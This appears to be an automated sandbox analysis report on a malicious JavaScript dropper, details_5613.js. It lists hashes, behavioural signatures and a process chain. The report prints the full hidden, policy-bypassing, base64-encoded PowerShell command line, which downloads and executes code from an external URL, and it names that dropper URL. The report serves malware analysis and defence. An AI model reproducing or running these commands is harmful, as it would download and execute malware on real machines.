Analysis

max time kernel: 838s
max time network: 840s
platform: windows7_x64
resource: win7v20210410
submitted: 26-07-2021 21:18

- Static task: static1
- Behavioral task: behavioral1
  Sample: details_5613.js
  Resource: win7v20210410
  Platform: windows7_x64
  0 signatures, 0 seconds
General

Target: details_5613.js
Size: 629KB
MD5: 13ecfbc54efb87498df12bbb02d054ef
SHA1: c857c59ef9fae1eaf4c3d1f8389586b2bc8ea8c6
SHA256: c91bd39590ae41161fc8d4ae9a453f689512ab90a0cc405d00dc9a50db05ea33
SHA512: 5993d9c9343c041162f779196fc7a5fea688c1d922d940ca7adf62e4deb683a6104b4299d89f4c5ab05fc1384e7aeeb4e229ce8aed503baa73982c1b8176992d
Score: 10/10
Malware Config

Extracted
Language: ps1
Deobfuscated
URLs:
- ps1.dropper: http://netvalleykenya.com/crm.php
Signatures

- Blocklisted process makes network request (2 IoCs)
  Processes:
  flow  pid   process
  7     1792  powershell.exe
  9     1792  powershell.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
  pid   process
  1792  powershell.exe
  1792  powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  description              pid   process
  Token: SeDebugPrivilege  1792  powershell.exe

- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes:
  description                       pid   process         target process
  PID 1052 wrote to memory of 1424  1052  wscript.exe     cmd.exe
  PID 1052 wrote to memory of 1424  1052  wscript.exe     cmd.exe
  PID 1052 wrote to memory of 1424  1052  wscript.exe     cmd.exe
  PID 1424 wrote to memory of 1792  1424  cmd.exe         powershell.exe
  PID 1424 wrote to memory of 1792  1424  cmd.exe         powershell.exe
  PID 1424 wrote to memory of 1792  1424  cmd.exe         powershell.exe
  PID 1792 wrote to memory of 828   1792  powershell.exe  rundll32.exe
  PID 1792 wrote to memory of 828   1792  powershell.exe  rundll32.exe
  PID 1792 wrote to memory of 828   1792  powershell.exe  rundll32.exe
Processes

1. C:\Windows\system32\wscript.exe (PID 1052)
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\details_5613.js
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\cmd.exe (PID 1424)
      Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1792)
         Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbgBlAHQAdgBhAGwAbABlAHkAawBlAG4AeQBhAC4AYwBvAG0ALwBjAHIAbQAuAHAAaABwACIAKQA=
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\rundll32.exe (PID 828)
            Command line: "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\glSbzLwAdKQN.bin StartW
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- memory/828-70-0x0000000000000000-mapping.dmp
- memory/1424-60-0x0000000000000000-mapping.dmp
- memory/1792-61-0x0000000000000000-mapping.dmp
- memory/1792-62-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp (Filesize: 8KB)
- memory/1792-63-0x0000000002370000-0x0000000002371000-memory.dmp (Filesize: 4KB)
- memory/1792-64-0x000000001ABF0000-0x000000001ABF1000-memory.dmp (Filesize: 4KB)
- memory/1792-65-0x000000001A8C0000-0x000000001A8C1000-memory.dmp (Filesize: 4KB)
- memory/1792-66-0x000000001AB70000-0x000000001AB72000-memory.dmp (Filesize: 8KB)
- memory/1792-67-0x000000001AB74000-0x000000001AB76000-memory.dmp (Filesize: 8KB)
- memory/1792-68-0x00000000023B0000-0x00000000023B1000-memory.dmp (Filesize: 4KB)
- memory/1792-69-0x000000001C230000-0x000000001C231000-memory.dmp (Filesize: 4KB)